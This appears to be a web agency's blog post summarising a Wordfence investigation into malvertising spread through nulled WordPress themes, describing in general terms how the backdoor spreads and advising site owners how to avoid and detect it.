An investigation by Wordfence, a WordPress security company, identified a persistent malvertising attack targeting WordPress sites. First discovered in February 2017, the team of analysts studied the exploit and published a whitepaper in November 2019, informing the WordPress community about the risk. According to Wordfence, the malvertising campaign infects sites and spreads by hackers who distribute illegal themes and plugins used on WordPress sites.
Unlike other malware injections, the malvertising exploit doesn’t directly attack a WordPress site. It relies on users who search for nulled content on the internet. Nulled content refers to situations where criminals remove the copyright protections from software and let you download it without having to pay the developers’ fee. By modifying the code, attackers successfully weaponized these WordPress files. Once installed on your site, the infection can spread to other sites hosted in the same environment.
Even for experienced security professionals, it isn’t easy to identify the malicious code. Attackers use seemingly legitimate file structures and naming conventions thereby hiding the exploit plain sight. Additionally, sophisticated backend server infrastructure enables the attackers to maintain a persistent presence on your site, even after you remove a portion of the infection.
Once you activate the infected theme file, a deployer script scans your site for any other themes and creates a backdoor in every file. The function also rewrites the timestamp on the theme file with the original date to prevent site administrators from finding the malware using a modification date.
Attackers monetize the malvertising code in two steps. The criminals manipulate search results to redirect users to sites that host the malvertising-infected files. After successfully infecting your site using a compromised theme, additional malware injections push malicious adverts onto visitors of the webpage. The malvertising exploit then allows criminals to generate ad revenue from every infected site.
Globally, about 455 million self-hosted websites use WordPress. That accounts for 20% of all self-hosted sites. As the infection spreads automatically with lateral propagation throughout the entire hosted environment, a single bad theme file can infect every site in the network. Due to the malicious nature of the code, attackers can use the backdoor to deploy any other malware into the hosted environment.
The scalability of the attack makes it a serious threat to developers, administrators, and site owners. It can change the backend server addresses on the fly, re-infect cleaned files, and the hardcoded backdoor allows attackers to add or remove code at will. Luckily, the team of analysts from Wordfence provides tools and procedures you can use to repair infected sites.
Firstly, you should never use any illegally obtained nulled content on your WordPress site. It’s safer to invest in a premium theme or use a featured, free one from a reputable developer. You should also remove any plugins or themes no longer supported by the original developers.
If you’ve used a nulled theme in the past, Wordfence published a list of indicators as an appendix in the whitepaper linked above. This provides you with a list of the signatures associated with the malvertising campaign used to attack WordPress sites. Checking your theme files and site logs for these domains, user names, and download sites will help your administrators determine if your site is using infected theme files. If you need assistance with WordPress marketing or hosting, reach out to Tactical Web Media to discuss our comprehensive set of digital services today.